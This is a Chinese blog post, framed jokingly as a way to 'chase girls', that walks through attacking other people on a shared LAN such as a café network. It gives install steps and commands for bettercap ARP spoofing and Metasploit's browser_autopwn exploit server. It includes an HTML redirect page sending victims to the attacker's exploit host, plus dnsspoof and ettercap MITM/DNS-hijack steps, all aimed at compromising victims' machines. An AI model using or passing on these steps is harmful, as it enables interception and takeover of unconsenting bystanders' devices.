【技术追妹学问】内网世界的王者

2017-01-05 11:05:35来源:作者:极客头条人点击

各位小司机你们好吗,记以前出过一个系列如何在咖啡厅等局域网场合内轻松泡到妹子后.本司机收到了好多小司机的反应说教程好可以,然而最近好无聊好无聊,本司机又想去那个啥了,然后给你们写了下列文章。

今天用到的三款大家熟悉的工具,bettercap,ettercap,MSF。这三款工具。【个人喜欢用ettercat不过ettercap很成功,但在新时代下它已经老了 ettercap的过滤器复杂,使用门槛高,在大型网络下,主机发现功能效果很差.优化不够,对研究人员来说,无用的功能太多 ,扩展性不够,开发需要掌握C/C++语言 所以我们要逐渐的放弃ettercap 不过还是有喜欢用的朋友,我会做两个版本的相关文章给大家演示的。

安装:

[C] 纯文本查看 复制代码

git clone [url]https://github.com/evilsocket/bettercap[/url]cd bettercapgem build bettercap.gemspecsudo gem install bettercap*.gem

如果报错,如图:

执行如下命令:

[C] 纯文本查看 复制代码

sudo apt-get install ruby-dev libpcap-devsudo gem install bettercap*.gem

成功安装,下面是搜集的参数。

[HTML] 纯文本查看 复制代码

-I, –interface IFACE 指定Network interface name,默认eth0 -S, –spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项 -T, –target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐 -O, –log LOG_FILE 日志功能 -D, –debug 调试功能,会将每一步操作详细记录,便于调试 -L, –local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭 -X, –sniffer 开启嗅探器. –sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) –sniffer-filter EXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器) -P, –parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 –no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 –no-spoofing 关闭欺骗模块,也可以使用参数–spoofer NONE代替 –proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 –proxy-port PORT 设置HTTP代理端口,此参数默认为8080 –proxy-module MODULE 指定加载的Ruby模块 –httpd 开启HTTP服务器,此参数默认为关闭 –httpd-port PORT 指定HTTP server port, 此参数默认为8081. –httpd-path PATH 指定HTTP server path,此参数默认为 ./. -h, –help 英文帮助

然而ettercap系统自带的所以不用掩饰。

首先我们要开启

[C] 纯文本查看 复制代码

service postgresql start

打开MSF

我们利用的是Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。

命令:

[C] 纯文本查看 复制代码

use server/browser_autopwn

我们来设置我们的IP

命令:

[C] 纯文本查看 复制代码

set uripath /

命令:

[C] 纯文本查看 复制代码

set LHOST (你的IP地址)

运行命令:

[C] 纯文本查看 复制代码

run

然后他会自动加载所以模块,加载好的样子。

我们执行arp攻击

[C] 纯文本查看 复制代码

bettercap -X

我们要创建一个dns欺骗的页面需要转到我们的那个端口。

打开我们KALI index.html

[C] 纯文本查看 复制代码

/var/www/html/index.html

[HTML] 纯文本查看 复制代码

<html> <head> <title>ichunqiu.com</title> <meta http-equiv="refresh" content="0;url=http://192.168.159.128:8080/"> <body> <p>i am ichunqiu.com</p> <p>ichunqiu.com</p> </body> </head></html>

然后我们开启apache2

[C] 纯文本查看 复制代码

etc/init.d/apache2 start

开始dns欺骗:

[C] 纯文本查看 复制代码

dnsspoof -f /var/www/html/index.html

下面的情况可想而知....打开的页面会跳转到 http://192.168.159.128:8080/ 然后进行模块的匹配达到上线的目的。

ettercap文章我拿以前我写的给大家看思路都是一样的.

首先我们要修改一下ettercap里面的DNS劫持文件的数据修改成所有网站都替换成我们的DNS.

在对应的位置添加对应的 标识和IP地址* 代表所有域名 后边就是你要欺骗为的IP地址,这里是当然是我自己的主机IP地址啦然后记得保存。

然后再来搭建一个web页面

编辑/var/www/html/index.html文件

改成你定义页面 这里我简单的写了一个html的主页。

我们在终端下打开ettercap的图像化界面!

输入命令:ettercap -G

弹出来一个图形化界面,我们首先需要点击Sniff 然后选择Unified sniffng 。

它会弹出让我们选择网卡,上节课我们介绍过了如何查找自己的网卡设备我就不再介绍了 然后我们确定。

我们扫描一下我们的局域网内的主机 我们也可以用快捷方式来进行操作 Ctrl+s 可以快速扫描。

扫描完成以后我们打开扫描好的自己信息也可以Ctrl+h打开。

我们把网关添加到Add to Target 1 右键添加Add to Target 2 添加攻击IP

这是添加好的样子。

然后点mitm --- arp posoning ,勾选sniff remote connections:

然后我们在选择 plugins然后选择第一个选项 也可以用快捷方式Ctrl+p

进行欺骗DNS!

之后start --- start sniffing开始监听 然后欺骗成功!!!!

最新文章

123

最新摄影

微信扫一扫

第七城市微信公众平台